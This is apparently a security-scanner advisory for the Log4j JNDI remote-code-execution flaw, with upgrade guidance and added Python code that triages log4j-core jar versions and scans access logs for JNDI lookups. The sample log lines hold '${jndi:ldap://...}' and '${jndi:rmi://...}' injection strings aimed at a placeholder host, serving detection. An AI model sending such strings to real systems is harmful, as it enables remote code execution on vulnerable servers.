## https://sploitus.com/exploit?id=SAINT:C093B43E357FA7E023374178D975EB2A
Added: 12/16/2021  


### Background

[Apache Log4j](<https://logging.apache.org/log4j/2.x/>) is a logging library used by many Java applications. 

### Problem

An attacker who is able to control log message content could embed a JNDI reference to an LDAP or RMI URL which downloads an executable Java class, leading to arbitrary command execution. 

### Resolution

[Upgrade](<https://logging.apache.org/log4j/2.x/download.html>) to Apache Log4j 2.12.2 or 2.16 or higher, or apply a fix from the vendor of the software which embeds Log4j. 
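As an added example (not part of the advisory), the version test below encodes the thresholds stated in the resolution: on the 2.12 branch, 2.12.2 counts as fixed; otherwise 2.16 or higher does. The `triage_jars` helper applies it to a constructed list of artifact names, inspecting only `log4j-core` jars, since that artifact carries the JNDI lookup code; anything it cannot parse is reported as unknown rather than silently passed.

```python
"""Check Log4j 2.x version strings against the fix thresholds given in
the advisory (2.12.2 on the 2.12 branch, or 2.16 and higher).
Added example; the sample jar names below are constructed."""
import re
from typing import Dict, List, Tuple

# Matches artifact names such as log4j-core-2.14.1.jar and captures the version.
LOG4J_CORE_RE = re.compile(r"^log4j-core-(?P<ver>.+?)\.jar$")


def parse_version(v: str) -> Tuple[int, int, int]:
    """Turn '2.16' or '2.12.2' into a comparable (major, minor, patch) tuple."""
    parts = v.strip().split(".")
    if not 1 <= len(parts) <= 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version: {v!r}")
    nums = [int(p) for p in parts] + [0] * (3 - len(parts))
    return nums[0], nums[1], nums[2]


def is_fixed_log4j2(v: str) -> bool:
    """True if the 2.x version meets the advisory's fix threshold."""
    major, minor, patch = parse_version(v)
    if major != 2:
        raise ValueError("only Log4j 2.x versions are covered here")
    if (major, minor, patch) >= (2, 16, 0):
        return True
    # 2.12.2 is the back-ported fix for the 2.12 (Java 7) branch.
    return minor == 12 and patch >= 2


def triage_jars(names: List[str]) -> Dict[str, List[str]]:
    """Sort log4j-core jar names into fixed / vulnerable / unknown buckets."""
    result: Dict[str, List[str]] = {"fixed": [], "vulnerable": [], "unknown": []}
    for name in names:
        m = LOG4J_CORE_RE.match(name)
        if not m:
            continue  # log4j-api and unrelated jars are not inspected
        try:
            bucket = "fixed" if is_fixed_log4j2(m.group("ver")) else "vulnerable"
        except ValueError:
            bucket = "unknown"  # pre-release or odd version strings need a manual look
        result[bucket].append(name)
    return result


# Constructed sample inventory, e.g. from listing an application's lib/ directory.
SAMPLE_JARS = [
    "log4j-core-2.14.1.jar",
    "log4j-core-2.17.0.jar",
    "log4j-core-2.12.2.jar",
    "log4j-api-2.14.1.jar",
    "log4j-core-2.0-beta9.jar",
]

if __name__ == "__main__":
    for bucket, jars in triage_jars(SAMPLE_JARS).items():
        print(f"{bucket}: {jars}")
```

Run against a real inventory, feed it the output of a file listing; an empty "vulnerable" bucket says nothing about log4j-core copies shaded into other jars, which need a separate check.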

### References

<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>  
<https://logging.apache.org/log4j/2.x/security.html>  
<https://isc.sans.edu/diary/28120>  


### Limitations

Exploit works on web applications which use Log4j to log the User-Agent header. 
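The problem and limitations sections together describe the detection opportunity: a JNDI lookup string arriving in a request header that the application logs. The added example below (not part of the advisory) parses access-log lines in the common "combined" format and flags `${jndi:<scheme>:...}` lookups in the User-Agent, Referer and request fields, reporting the scheme so LDAP and RMI hits stand out. The log lines and the `placeholder.example` host are constructed. It matches the plain lookup form only, so a hit is a trigger for investigation, not the sole detection.

```python
"""Flag JNDI lookup strings in web-server access logs.
Added example; the sample lines below are constructed."""
import re
from typing import List, Tuple

# Apache/Nginx "combined" format:
#   ip ident user [timestamp] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Log4j lookup syntax ${jndi:<scheme>:...}; case-insensitive, stray spaces tolerated.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:", re.IGNORECASE)

# Fields whose content is attacker-supplied and commonly ends up in application logs.
INSPECTED_FIELDS = ("ua", "referer", "request")

# Constructed sample log; 198.51.100.0/24 and placeholder.example are reserved names.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://placeholder.example/a}"',
    '198.51.100.7 - - [16/Dec/2021:10:00:03 +0000] "GET /login HTTP/1.1" 200 800 "${JNDI:rmi://placeholder.example/b}" "curl/7.68.0"',
    '192.0.2.9 - - [16/Dec/2021:10:00:04 +0000] "POST /api HTTP/1.1" 204 0 "-" "python-requests/2.26"',
    "this line is not in combined format and is skipped",
]


def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str, str, str]]:
    """Return (line_no, field, scheme, source_ip) for every JNDI lookup found."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = COMBINED_RE.match(line)
        if not m:
            continue  # unparseable lines are skipped, not treated as clean
        for field in INSPECTED_FIELDS:
            hit = JNDI_RE.search(m.group(field))
            if hit:
                findings.append((n, field, hit.group("scheme").lower(), m.group("ip")))
    return findings


def source_ips(findings: List[Tuple[int, str, str, str]]) -> List[str]:
    """Distinct source addresses behind the findings, in first-seen order."""
    seen: List[str] = []
    for _, _, _, ip in findings:
        if ip not in seen:
            seen.append(ip)
    return seen


if __name__ == "__main__":
    hits = find_jndi_lookups(SAMPLE_LOG)
    for line_no, field, scheme, ip in hits:
        print(f"line {line_no}: {scheme} lookup in {field} from {ip}")
    print("sources:", source_ips(hits))
```

The scan runs on the web server's own access log, which records the header whether or not the application behind it logged it, so it also surfaces attempts against applications that turned out not to be exposed.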

### Platforms

Windows  
Linux